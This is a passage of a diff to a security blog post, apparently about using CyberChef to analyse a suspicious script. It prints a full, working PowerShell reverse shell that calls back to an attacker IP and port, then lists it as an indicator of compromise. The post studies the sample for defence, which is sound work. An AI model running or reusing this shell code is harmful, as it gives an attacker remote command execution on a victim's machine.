BenjiTrapp/benjitrapp.github.io/_defenses/2023-06-18-cyberchef-intoduction.md

 $client = New-Object System.Net.Sockets.TCPClient("10.20.30.40",4711);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```

-To come back to our inital questions related to IOCs we can now dig deeper and summarize the following results:
+To come back to our initial questions related to IOCs we can now dig deeper and summarize the following results:

 1. The PowerShell drops a reverse Shell, so this script can be seen as malicious.
 2. The target URL 10.20.30.40 on Port 4711 belongs to our adversary.